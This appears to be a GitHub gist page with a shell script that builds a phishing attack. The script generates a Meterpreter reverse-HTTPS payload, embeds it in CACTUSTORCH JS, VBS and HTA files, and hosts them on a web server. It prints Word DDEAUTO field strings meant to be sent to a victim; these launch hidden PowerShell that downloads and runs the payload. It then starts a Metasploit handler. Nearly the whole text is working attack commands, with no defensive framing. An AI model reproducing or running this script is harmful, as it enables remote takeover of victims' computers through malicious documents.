Skip to content

Instantly share code, notes, and snippets.

@xillwillx
Last active August 6, 2018 07:25
Show Gist options
  • Save xillwillx/171c24c8e23512a891910824f506f563 to your computer and use it in GitHub Desktop.
Save xillwillx/171c24c8e23512a891910824f506f563 to your computer and use it in GitHub Desktop.
CactusTorchDDEAUTO
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$IP\/CACTUSTORCH.js\',\'index.js\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.js\" >payloads.txt
echo -e "\nVBS PAYLOAD:\n\
DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$IP\/CACTUSTORCH.vbs\',\'index.vbs\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.vbs\" >>payloads.txt
echo -e "\nHTA PAYLOAD:\n\
DDEAUTO C:\\\\\Programs\\\\\Microsoft\\\\\Office\\\\\MSword.exe\\\\\..\\\\\..\\\\\..\\\\\..\\\\\windows\\\\\system32\\\\\mshta.exe \"http://$IP/CACTUSTORCH.hta\"" >>payloads.txt
clear
cat payloads.txt && rm payloads.txt
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false; set EnableStageEncoding true; exploit -j -z"
@xillwillx
Copy link
Author

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment